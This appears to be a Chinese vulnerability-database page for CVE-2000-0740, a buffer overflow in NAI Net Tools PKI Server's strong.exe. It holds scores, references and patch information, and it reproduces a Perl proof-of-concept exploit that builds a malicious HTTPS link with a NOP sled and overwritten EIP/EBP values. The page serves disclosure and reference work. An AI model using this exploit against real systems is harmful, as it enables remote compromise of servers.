CVE-2000-0740
CVSS5.0
发布时间 :2000-10-20 00:00:00
修订时间 :2008-09-05 16:21:46
NMCOE    

[原文]Buffer overflow in strong.exe program in NAI Net Tools PKI server 1.0 before HotFix 3 allows remote attackers to execute arbitrary commands via a long URL in the HTTPS port.


[CNNVD]NAI Net Tools PKI server strong.exe命令执行漏洞(CNNVD-200010-021)

        NAI Net Tools PKI server 1.0 HotFix 3之前版本的strong.exe存在缓冲区溢出漏洞。远程攻击者可以借助HTTPS端口的超长URL执行任意命令。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:network_associates:net_tools_pki_server:1.0hotfix1
cpe:/a:network_associates:net_tools_pki_server:1.0
cpe:/a:network_associates:net_tools_pki_server:1.0hotfix2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0740
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0740
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200010-021
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1536
(VENDOR_ADVISORY)  BID  1536
http://download.nai.com/products/licensed/pgp/hf3pki10.txt
(UNKNOWN)  CONFIRM  http://download.nai.com/products/licensed/pgp/hf3pki10.txt
http://archives.neohapsis.com/archives/bugtraq/2000-07/0473.html
(VENDOR_ADVISORY)  BUGTRAQ  20000802 NAI Net Tools PKI Server vulnerabilities
http://xforce.iss.net/static/5026.php
(UNKNOWN)  XF  nai-nettools-strong-bo(5026)
http://www.osvdb.org/1488
(UNKNOWN)  OSVDB  1488

- 漏洞信息

NAI Net Tools PKI server strong.exe命令执行漏洞
中危 缓冲区溢出
2000-10-20 00:00:00 2005-05-02 00:00:00
远程  
        NAI Net Tools PKI server 1.0 HotFix 3之前版本的strong.exe存在缓冲区溢出漏洞。远程攻击者可以借助HTTPS端口的超长URL执行任意命令。

- 公告与补丁

        

- 漏洞信息 (20134)

NAI Net Tools PKI Server 1.0 strong.exe Buffer Overflow Vulnerability (EDBID:20134)
windows remote
2000-08-02 Verified
0 juliano
N/A [点击下载]
source: http://www.securityfocus.com/bid/1536/info

Certain versions of Network Associates Inc.'s Net Tools PKI (Public Key Infrastructure) server ship with a buffer overflow vulnerability which could lead to a remote compromise of the system running the PKI server. The problem lies within the webserver component of the PKI server (strong.exe) which operates several 'virtual servers' required to operate the PKI server. The first is the Administrative Web Server which listens via TCP port 443, the second is Enrollment Web Server which listens on TCP port 444. Unlike the Administrative Web Server the Enrollment Web Server does not require credentials to be exchanged before a user can talk to the webserver. It is via this virtual server that an attacker can exploit the problem at hand.

In particular this problem is located in the PKI servers log generation routines. In order to exploit it, a user must simply connect via an HTTPS connection to port 444 and provide an overly long URL (2965 + characters) which will be mishandled by the log routines resulting in a buffer overflow. 

#!/usr/bin/perl
# NAI NetTools PKI SERVER 1.0 - Long URL Stack Overflow Exploit
# Replace host and port an create the html file:
#./pkiluso.pl > test.html
#Open the html in a SSL compatible browser and click on the link. puf!
#Juliano Rizzo (c) 2000 juliano@core-sdi.com

$host = "localhost";
$port = "444";
$shell_code= "\x90\x90\x90\x90";

#We can set the values of EIP and EBP, our code is on the stack
#and in 0x01613A2E.
$eip = "\x2E\x3A\x61\x01";#0x01613A2E (URL readed from socket)
#$eip = "\x64\x83\x40%00";#0x00408364 (CALL EBP)
$ebp = "\xCB\xF2\01\x02"; #0x0200F2CB (trunca el string por el 00)
$noplen = (2965 - length($shell_code));
print "<html><body><a href=\"https://".$host.":".$port."/";
print "\x90"x$noplen;
print
$shell_code.$ebp.$eip."\x18\x6B\x62\x01\x18\x6B\x62\x01\x18\x6B\x62\x01".
"\">Click here to exploit.!</a></body></html>";
		

- 漏洞信息

1488
NAI Net Tools PKI Server strong.exe Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Unknown Third-party Verified

- 漏洞描述

A remote overflow exists in Net Tools PKI Server. The "strong.exe" program fails to sanitize input resulting in a buffer overflow. With a specially crafted request, an attacker can cause the execution of arbitrary code resulting in a loss of integrity.

- 时间线

2000-08-02 Unknow
2000-08-02 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Network Associates has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站